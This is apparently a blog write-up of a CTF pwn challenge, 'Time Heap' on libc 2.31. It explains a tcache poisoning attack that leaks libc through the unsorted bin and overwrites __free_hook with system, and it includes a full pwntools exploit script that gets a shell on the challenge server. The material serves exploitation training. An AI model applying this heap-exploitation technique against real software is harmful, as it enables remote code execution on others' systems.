MENU

PWN Challenge Time Heap

March 31, 2021 • Read: 343 • Pwn,CTF

题目信息

1.libc 2.31
2.两次add机会,一次add两个
3.有edit,有show

解题思路

1.free之后用edit绕过检测,free 7个tcache chunk。
2.再次free之后就会进入unsorted bin,leak libc
3.修改next指针到__free_hook(申请的第二个堆块会申请到),并且修改为system。
4.free触发 system

from pwn import *

#r = process('./time_heap')
r = remote('nc.eonew.cn', 10015)
context.log_level = "debug"
libc = ELF('libc2.31/libc.so.6')
def choice(idx):
    r.sendlineafter("Your choice: ", str(idx))


def add(size, content='a', remark='b'):
    choice(1)
    r.sendlineafter("Size: ", str(size))
    r.sendafter("Content: ", content)
    r.sendafter("Remark: ", remark)


def delete(idx):
    choice(2)
    r.sendlineafter("Index: ", str(idx))


def edit(idx, content='a', remark='b'):
    choice(3)
    r.sendlineafter("Index: ", str(idx))
    r.sendafter("Content: ", content)
    r.sendafter("Remark: ", remark)


def show(idx):
    choice(4)
    r.sendlineafter("Index: ", str(idx))


add(0x88) #0
for i in range(7):
    delete(0)
    edit(0, 'a' * 0x10)
delete(0)
show(0)
malloc_hook_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 96 - 0x10
libc.address = malloc_hook_addr - libc.sym['__malloc_hook']
log.success("libc_base: " + hex(libc.address))
edit(0, p64(libc.sym['__free_hook']))
add(0x88, '/bin/sh\x00', p64(libc.sym['system']))
delete(1)
r.interactive()
Archives QR Code Tip
QR Code for this page
Tipping QR Code